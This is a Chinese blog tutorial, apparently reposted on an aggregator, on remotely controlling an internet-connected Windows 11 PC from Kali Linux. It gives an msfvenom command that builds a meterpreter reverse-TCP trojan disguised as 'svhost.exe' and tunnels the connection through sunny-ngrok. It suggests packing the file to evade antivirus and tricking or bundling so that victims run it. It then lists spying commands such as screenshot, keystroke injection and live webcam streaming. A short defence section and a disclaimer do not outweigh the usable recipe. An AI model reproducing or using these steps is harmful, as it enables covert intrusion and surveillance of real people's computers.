模拟黑客使用Kali Linux远程控制Windows(互联网)

这篇具有很好参考价值的文章主要介绍了模拟黑客使用Kali Linux远程控制Windows(互联网)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

仅限于技术交流,请勿用于非法用途!

网上很多的教程都是在VMware虚拟机中实现通过kali linux控制windows电脑,正巧我这儿有闲置的笔记本,为了更真实的模拟黑客攻击电脑的行为,做以下实验

使用工具:

虚拟机:Vmware Workstation

控制端系统:Kali Linux

内网穿透:sunny-ngrok

被控端系统:Windows 11

一、安装Vmware Workstation软件,搭建Kali Linux虚拟机

本实验使用VM15虚拟机:

kali远程控制windows,Kali Linux,网络安全,系统安全,Powered by 金山文档

注意,因为我们最终要实现通过kali控制外网的电脑,因此我们要将网络连接改为桥接模式

二、建立隧道

隧道的目的为了将被控端的内网的数据传输到外网,以便使用kali进行远程控制

这里我们使用Sunny-Ngrok的内网穿透服务(测试使用了三天,挺稳定的)

1、用户注册

2、实名认证

3、购买隧道

kali远程控制windows,Kali Linux,网络安全,系统安全,Powered by 金山文档

Sunny-Ngrok官网有详细教程,本文就不细说了,直接购买即可,总共花了¥8(使用时间一个月)

4、建立隧道

隧道协议选tcp,隧道名称和远程端口都需要自己定,本地ip为kali的ip,本地端口自己定:

kali远程控制windows,Kali Linux,网络安全,系统安全,Powered by 金山文档

建立好之后会生成隧道id,隧道id一定要保密:

kali远程控制windows,Kali Linux,网络安全,系统安全,Powered by 金山文档

5、点击客户端下载,选择Linux(32Bit还是64Bit要看自己笔记本是多少位的[目前大多数都是64位])

使用unzip命令把下载好的客户端解压出来,启动客户端:

kali远程控制windows,Kali Linux,网络安全,系统安全,Powered by 金山文档

此时隧道建立成功:

kali远程控制windows,Kali Linux,网络安全,系统安全,Powered by 金山文档

三、制作木马

在kali中使用msf工具制作木马(木马本例命名为svhost.exe,大家可以自行设置):

kali远程控制windows,Kali Linux,网络安全,系统安全,Powered by 金山文档

命令如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=远程地址 LPORT=隧道端口 -f exe > /root/svhost.exe

四、加壳

大家根据自己需要,因为我是关闭杀毒软件进行测试的,包括被控端(windows 11)的微软的安全中心也是关闭的

加壳的目的是为了防止杀毒软件报毒,以免被杀,至于使用什么加壳工具,网上很多,大家可以自行选择,如果感兴趣的可以把生成出来的木马编译一下,已达到免杀的目的

五、开启本地监听,查看配置,执行exploit/run等待被控端运行

kali远程控制windows,Kali Linux,网络安全,系统安全,Powered by 金山文档

六、木马上线

可以使用诱导、捆绑、远程执行等方式让其运行~

因为本例属于实验测试,所以直接拿U盘拷贝过去执行上线即可

kali远程控制windows,Kali Linux,网络安全,系统安全,Powered by 金山文档

小电脑的屏幕为kali在msf中执行screenshot命令的截图,截取大电脑当前的屏幕信息(右边显示器的信息为隧道页面,忽略即可)

远程开启电脑摄像头视频

上面的视频为2023年1月26日在kalilinux系统中使用msf工具执行webcam_stream命令远程调用实时摄像头画面(不太会打码,不过web页面中的字可以看清楚)

当拿到被控端权限之后,还可以做的包含但不限于:

sysinfo 获取有关远程系统的信息
getdesktop 获取当前meterpreter桌面
keyboard_send 发送键击
mouse 发送鼠标事件
screenshare 屏幕共享实时监视远程用户桌面
screenshot 截图获取交互式桌面的截图
webcam_stream 远程开启摄像头
上传下载被控端的内容等等等等

如果是内网,很有可能拿下内网的更多电脑权限^_^

七、防范

1、陌生的.exe不要轻易执行,一定要从官网下载软件

2、windows的安全中心不要关闭!不要关闭!不要关闭!

3、安装杀毒软件(和第二点并不冲突)

4、……文章来源地址https://www.toymoban.com/news/detail-639524.html

到了这里,关于模拟黑客使用Kali Linux远程控制Windows(互联网)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Windows的RDP远程控制

    RDP远程桌面介绍 RDP,Remote Desktop Protocol,远程桌面协议 为客户端提供服务端的图形桌面的显示映像,并允许活动控制 服务端监听TCP协议的3389端口 微软使用RDP协议来实现Win主机的远程管理 Win家庭版不支持作为被控端 确保主控机与被控机直接可以连通(使用ping命令测试网络连

    2024年02月13日
    浏览(34)
  • Windows在外远程桌面控制macOS 【macOS自带VNC远程】

    macOS系统自带有VNC远程桌面,我们可以在控制端上安装配置VNC客户端,以此来实现远程控制macOS。但通常需要在不同网络下进行远程控制,为此,我们可以在macOS被控端上使用cpolar做内网穿透,映射VNC默认端口5900,通过所生成的公网地址,来实现在公网环境下远程控制VNC。 打

    2024年02月03日
    浏览(90)
  • Windows在外远程桌面控制macOS【macOS自带VNC远程】

    转载自cpolar极点云的文章:公网远程控制MacOS【使用Mac自带VNC远程】 macOS系统自带有VNC远程桌面,我们可以在控制端上安装配置VNC客户端,以此来实现远程控制macOS。但通常需要在不同网络下进行远程控制,为此,我们可以在macOS被控端上使用cpolar做内网穿透,映射VNC默认端口

    2024年02月04日
    浏览(50)
  • 【macOS自带VNC远程】——Windows在外远程桌面控制macOS

    macOS系统自带有VNC远程桌面,我们可以在控制端上安装配置VNC客户端,以此来实现远程控制macOS。但通常需要在不同网络下进行远程控制,为此,我们可以在macOS被控端上使用cpolar做内网穿透,映射VNC默认端口5900,通过所生成的公网地址,来实现在公网环境下远程控制VNC。 打

    2024年02月04日
    浏览(47)
  • 【Windows】局域网内远程桌面控制

    工作中的很多场景需要远程操作,这时候可以借助远程桌面应用程序实现, 比如AnyDesk、向日葵、TeamViewer等。 windows10系统,其操作系统自带了远程桌面工具。 如果您是在同一个局域网内的两台window10操作系统之间做远程桌面连接,请参考本博客。 注意: windows10家庭版没办法

    2024年02月14日
    浏览(51)
  • 【python】用 Python 远程控制 Windows 服务器,简直太方便了~

    在很多企业会使用闲置的 Windows 机器作为临时服务器,有时候我们想远程调用里面的程序或查看日志文件。 Windows 内置的服务「 winrm 」可以满足我们的需求。 它是一种基于标准简单对象访问协议( SOAP )的防火墙友好协议,允许来自不同供应商的硬件和操作系统进行互操作

    2024年01月21日
    浏览(44)
  • linux服务器远程控制安全配置

    一、设置linux服务器用户登录错误次数锁定配置         为防止遭受恶意暴力破解,设置账户登录尝试次数并进行锁定,有效保护账户的安全。         1、登录失败处理功能策略(服务器终端)                 注:用户锁定期间,无论在输入正确还是错误的密码

    2024年04月12日
    浏览(41)
  • Linux 远程控制服务(SSH和Telnet)

    服务器(IP:192.168.10.91) 配置sshd服务 两种验证方式: 1.基于口令的验证—用账户和密码来验证登录 2.基于密钥的验证—需要在本地生成密钥对,然后把密钥对中的公钥上传至服务器,并与服务器中的公钥进行比较;该方式相较来说更安全。 服务名:sshd(系统默认状态是安

    2024年02月10日
    浏览(52)
  • Linux基础——远程访问及控制(SSH)

    是一种安全通道协议,主要用来实现字符界面的远程登录、远程复制等功能。SSH协议对通信双方的数据传输进行了加密处理,其中包括用户登录时输入的用户口令。因此SSH协议具有很好的安全性。 SSH优点: 数据传输是加密的,可以防止信息泄漏 数据传输是压缩的,可以提高

    2023年04月26日
    浏览(42)
  • Linux远程访问及控制SSH命令

    1.1.1什么是SSH服务器? SSH(Secure Shell)是一种安全通道协议,主要用来实现字符界面的远程登录、远程 复制等功能; SSH 协议对通信双方的数据传输进行了加密处理,其中包括用户登录时输入的用户口令; SSH 为建立在应用层和传输层基础上的安全协议。对数据进行压缩,加

    2024年02月03日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包